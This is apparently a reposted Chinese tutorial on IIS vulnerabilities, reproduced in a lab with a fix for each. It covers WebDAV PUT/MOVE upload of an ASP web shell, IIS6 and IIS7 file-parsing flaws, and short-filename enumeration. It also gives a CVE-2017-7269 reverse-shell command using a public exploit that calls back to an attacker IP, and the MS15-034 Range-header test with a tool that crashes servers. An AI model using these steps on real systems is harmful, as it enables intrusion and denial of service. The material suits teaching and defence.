IIS漏洞大全(附修复方法)
IIS6.0IIS6.0恣意文件写入
IlS Server 在 Web 服务扩展中开启了 WebDAV,设置了可以写入的权限,造成恣意文件上传。
漏洞复现
fofa:"llS-6.0" or
当地搭建2003 server
1)开启 WebDAV 和写权限:
https://i-blog.csdnimg.cn/direct/35e2b7c11f064ae08a27382589248f3b.png
https://i-blog.csdnimg.cn/direct/bdf29dcc287a4505a873f7387a7a5036.png
https://i-blog.csdnimg.cn/direct/5e63e0cbffb74d3691ad8c00f4bf6700.png
https://i-blog.csdnimg.cn/direct/ec574258172a442b87f3d7dbb62de420.png
做好准备工作后开启环境,然后我们去访问设置的IP,访问到如下页面
https://i-blog.csdnimg.cn/direct/5cb22fe76b384c9bac36656f2a2c30e7.png
然后开启抓包刷新页面,在抓到的数据包后将其发送到重放器,将请求方式改为OPTIONS后点击发送,在返回包中就可以看到可以利用的请求方式
https://i-blog.csdnimg.cn/direct/710817c6d6104109a311122901774715.png
这里可以直接用PUT方式上传文件,但是不能上传脚本文件,以是为了上传脚本,我们可以先上传一个平凡的1.txt文件,然后利用move方式将其改名为脚本文件的格式
https://i-blog.csdnimg.cn/direct/52856b242ff94e10bc6c403dfc55df4b.png
其中PUT /背面跟上我们要上传的文件名,然后在末了一行写上我们要上传的文件的内容,将多余的请求数据都删除,只留下请求头,host以及长度和内容,然后点击发送,出现201则上传乐成https://i-blog.csdnimg.cn/direct/af8f823630734775b57f997485e90a13.png
我们回到靶机中刷新查看也发现上传乐成
https://i-blog.csdnimg.cn/direct/148a8ec5d5e54dfca719e5c258b2480f.png
然后将请求方式改为MOVE后,将数据包改为如下内容后再次点击上传,shell.asp是想改为的名字
MOVE /2.txt HTTP/1.1
Host: 192.168.159.131
Destination: http://192.168.159.131/shell.asp
https://i-blog.csdnimg.cn/direct/f9ffdc832a994ac3a6af1ea2d117b545.png
我们到靶机中查看,乐成上传
https://i-blog.csdnimg.cn/direct/ca4c8c15b5184a6cb4e8d38599ba7ef5.png
漏洞修复
1.关闭webdav ; 2.关闭写⼊权限 。 IIS6.0解析漏洞
在iis6.x版本中存在可以将恣意文件当作asp文件解析的漏洞,我们在网站目次下创建一个名为1.asp的文件夹,则在其中的任何文件都会当作asp文件去运行,如下
先在默认网站中右键,点击打开
https://i-blog.csdnimg.cn/direct/4b5b544f17bc449188f7923f46c23112.png
然后在这里创建一个1.asp的文件夹,再创建一个内容为<%=now()%>(这个函数为查看当前时间)的txt文件,将1.txt放入1.asp中,然后用物理机去访问,即可得到当前时间
https://i-blog.csdnimg.cn/direct/4eb406ca377748478b55b36d938169a4.png
https://i-blog.csdnimg.cn/direct/f9cdd0326639409eb7b83034b5e309ca.png
https://i-blog.csdnimg.cn/direct/f554f00d086d4e228e1937aa7882c899.png
用ipconfig查看假造机IP后去物理机访问192.168.209.133/1.asp/1.txt
https://i-blog.csdnimg.cn/direct/10fd5bf7da784d26bc970a0bcf9f2754.png
二.IIS6.x(2)
当我们在网站目次下创建一个名为1.asp.;.jpg的文件,内容同样为<%=now()%>,当我们去访问时,也会得到当前时间,这证明该文件固然后缀名为jpg,但是他也会被当作asp文件运行。
https://i-blog.csdnimg.cn/direct/1bd0ecbd13f348b697c0b38fd8af779b.png
IIS短⽂件漏洞
Windows 以 8.3 格式⽣成与 MS-DOS 兼容的(短)⽂件名,以答应基于 MS-DOS 或 16 位 Windows的程序访问这些⽂件。在cmd下输⼊" dir /x"即可看到短⽂件名的结果。 原理 当后缀⼩于4时,短⽂件名产⽣必要⽂件(夹)名前缀字符⻓度⼤于即是9位。 当后缀⼤于即是4时,⽂件名前缀字符⻓度即使为1,也会产⽣短⽂件名。 ⽬前IIS⽀持短⽂件名推测的HTTP⽅法紧张包括:DEBUG、OPTIONS、GET、POST、HEAD、 TRACE六种; IIS 8.0之后的版本只能通过OPTIONS和TRACE⽅法被推测乐成。 漏洞复现
IIS8.0以下版本必要开启ASP.NET⽀持,IIS>=8.0版本,即使没有安装ASP.NET,通过OPTIONS和TRACE⽅法也可以猜解乐成。以下通过开启IIS6.0 ASP.NET后进⾏复现。
https://i-blog.csdnimg.cn/direct/42485f3ce9004334a596f7c4e846e10b.png 在这里,我们可以看到有短文件 https://i-blog.csdnimg.cn/direct/90b67260d27749228b6b3c0b30f56c03.png 短⽂件名特征: 1. 只显示前6位的字符,后续字符⽤~1代替。其中数字1是可以递增。假如存在⽂件名类似的⽂ 件,则前⾯的 6个字符是相同的,后⾯的数字进⾏递增。 https://i-blog.csdnimg.cn/direct/3fb675e1aa234b5bba9cc0f538ed73e7.png 2. 后缀名最⻓只有3位,超过3位的会⽣成短⽂件名,且后缀多余的部分会截断。 https://i-blog.csdnimg.cn/direct/cb3b2a4935634dd4aad40a96f8c9d8c1.png 3. 全部⼩写字⺟均转换成⼤写的字⺟ ; https://i-blog.csdnimg.cn/direct/6755e0aa6b894b398b131d53e70806ae.png 4. ⻓⽂件名中包含多个” . ”的时间,以⽂件末了⼀个” . ”作为短⽂件名的后缀; https://i-blog.csdnimg.cn/direct/d93184b3a71c4a0386fbd9a029b1f703.png 5. ⻓⽂件名前缀/⽂件夹名字符⻓度符合0-9和A-Z、a-z范围且必要⼤于即是9位才会⽣成短⽂ 件名,假如包含空格或者其他部分特别字符,岂论⻓度均会⽣成短⽂件。 https://i-blog.csdnimg.cn/direct/1f89cc4c31494be688f53ef969e2e6ea.png 使⽤payload验证⽬标是否存在IIS短⽂件名漏洞,显示的404,说明⽬标存在该短⽂件名: https://i-blog.csdnimg.cn/direct/8403b45ab3e94e4194b8758eeb091b67.png 通过欣赏器访问⼀个不存在的短⽂件名,会返回400状态码, 400说明该⽂件不存在: https://i-blog.csdnimg.cn/direct/f88e93a97f6f482cb1c331f105c4eb28.png 根据上面测试可以说明⽬标存在IIS短⽂件漏洞 ; 判定漏洞存在后,接下来⼿⼯详细分析猜解IIS短⽂件名: 以 abcde11123354566.txt⽂件为例,分别访问 : /a*~1*/a.aspx ;/b*~1*/a.aspx https://i-blog.csdnimg.cn/direct/16929fef9f3f4103b3e090ee9a0010dc.png https://i-blog.csdnimg.cn/direct/b74da718719241358f6128c09b6bc8ba.png 可以发现,a开头的文件由于存在,以是显示404,b开头的文件由于不存在,以是显示badrequest,我们接着猜文件名第二位, https://i-blog.csdnimg.cn/direct/c256cc2770e844d684a3bb127486565f.png aa不存在,我们实行ab,ab存在 https://i-blog.csdnimg.cn/direct/75b9dec6c3894b20b8baa94d912e8852.png 之后的就按照如许一步一步试全部的字母与数字 而文件后缀名要在~1背面实行,我们先输入.a,返回badrequest,说明ab开头的文件后缀名不是a开头的 https://i-blog.csdnimg.cn/direct/d5089040816f427a97fadfc36028019c.png 我们再实行t,返回404,则ab开头的文件后缀名第一个字母是t https://i-blog.csdnimg.cn/direct/206a68dceab7461eafe1ead2758696c4.png 也是,按照字母次序一个一个实行,末了试出文件名与后缀 https://i-blog.csdnimg.cn/direct/7df543b345f142aa98a435b64ac661fd.png 下面是IIS短⽂件名扫描软件,获取⽬标存在哪些短⽂件名; ⼯具: https://github.com/lijiejie/IIS_shortname_Scanner ⽤法: python2 iis_shortname_Scan.py http://192.168.159.131/ https://i-blog.csdnimg.cn/direct/c84a68f547a0407bbc014324e57f51ca.png 漏洞防御
1. 升级.net framework ; 2. 修改注册表键值: a. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem 修改 NtfsDisable8dot3NameCreation为1。 b. 修改完成后,必要重启体系⽣效。 c. 命令⾏关闭 fsutil behavior set disable8dot3 1 。 d. 新建⽂件 aaaaaaaaaaaaaazzzzz.txt 已经没有短⽂件名了。 e. 注:此⽅法只能禁⽌NTFS8.3格式⽂件名创建,已经存在的⽂件的短⽂件名⽆法移除,需 要重新复制才会消 失。假如不重新复制,已经存在的短⽂件名则是不会消失的。 f. 将web⽂件夹的内容拷⻉到另⼀个位置,如c:\www到c:\ww,然后删除原⽂件夹,再重 命名c:\ww到 c:\www。 IIS RCE-CVE-2017-7269
Microsoft windows Server 2003 R2中的 Interne信息服务IIS6.0中的 WebDAV服务中的 ScStoragePathFromUrl函数中的缓冲区溢出答应长途攻击者通过以 If:<http:// 开头的⻓标头执 ⾏恣意代码 PROPFIND请求。 影响范围 WiNdows Server 2003 R2上使⽤IIS6.0并开启 WebDAV扩展。 漏洞复现-反弹shell
同样的,我们再windowserver2003中的iis服务
这里必要用到一个工具,下载链接为:https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269
将其下载到kali中后,利用如下命令运行工具
python2 '/root/Desktop/iis6-exploit-2017-CVE-2017-7269-master/iis6-exploit-2017-CVE-2017-7269-master/iis6 reverse shell' 192.168.159.131 80 192.168.159.129 4455 其中第一个ip是我们靶机的ip,也就是server2003的IP,第二个ip为攻击机-也就是kali的IP,以及kali开启监听的端口,开启监听后直接运行命令,稍微等待后即可乐成反弹到shell
https://i-blog.csdnimg.cn/direct/6f3599f906b1459e9055b97c600b27b2.png
https://i-blog.csdnimg.cn/direct/7e2dda29816a48fbb61d0e3c7f16d9ad.png
漏洞防御
1.关闭 WebDav服务 ; 2.升级 ; 3.部署安全设备 。 IIS 7x
IIS7⽂件解析漏洞
在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在一个文件路径/xx.jpg背面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。接下来我们实行复现,首先打开设置文件php.ini,查找cgi.fix_pathinfo=1,将前面的分号;删除
https://i-blog.csdnimg.cn/direct/fa05b5307a4245dcad8a90925ab704d5.png
然后到网站目次下创建一个名为1.jpg的文件,右键用记事本打开,内容改为<?php phpinfo(); ?>,生存后访问
https://i-blog.csdnimg.cn/direct/e182a02d12af4a4d853071454c275b16.png
https://i-blog.csdnimg.cn/direct/3581f07cd1c446a7bea07921a8d27630.png
在url背面加上/1.jpg/.php,这个jpg文件就会被当作php文件去运行
https://i-blog.csdnimg.cn/direct/0d9262d965fd48749e2dc35a6830ff1b.png
HTTP.SYS长途代码执⾏(MS15-034) MS-->Microsoft 2015 -034
HTTP.SYS是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能, 从IIS6.0引 ⼊,IIS服务进程依靠HTTP.SYS HTTP.SYS长途代码执⾏漏洞实质是HTTP.SYS的整数溢出漏洞,当攻击者向受影响的 Windows体系发送 特别筹划的HTTP 请求,HTTP.sys 未正确分析时就会导致此漏洞,乐成利⽤ 此漏洞的攻击者可以在体系 帐户的上下⽂中执⾏恣意代码。 紧张存在Windows+IIS的环境下,任何安装了微软IIS 6.0以上的Windows Server 2008 R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操纵体系都受到这个漏洞的影响验证这 个漏洞。 漏洞复现
这次我们去windowserver2012中开启iis服务作为我们的靶机
https://i-blog.csdnimg.cn/direct/5d2016ecf185413a92bcbc097e6652aa.png 访问网站后开启抓包再次访问,即可抓到数据包 https://i-blog.csdnimg.cn/direct/fb74402427e148dbaa6fac313a633cf6.png https://i-blog.csdnimg.cn/direct/243be321c0c743ec920644082028b4b1.png 在抓到的数据包中,我们加入 Range: bytes=0-18446744073709551615字段后发送,假如返回416Requested Range Not Satisfiable,则存在HTTP.SYS长途代码执⾏漏洞 https://i-blog.csdnimg.cn/direct/dd49e5230fbe457296ca759c5600454c.png 这里我们利用一个工具,其 可以造成⼀个ddos的结果,下载链接: https://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC 在终端运行,利用python3 https://i-blog.csdnimg.cn/direct/b746f06b676b4415885378d54babb553.png 填上地点,端⼝,以及一个存在的图片,这里默认的主⻚图⽚ iis8.5的是(iis-85.png),其他的可以根据百度查,每个版本的欢迎⻚都不⼀样,选择 y 然后就可以看到我们的靶机变卡了,甚至蓝屏 https://i-blog.csdnimg.cn/direct/148154781eb845bca43feec141c858c8.png 漏洞修复
安装修复补丁(KB3042553)
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]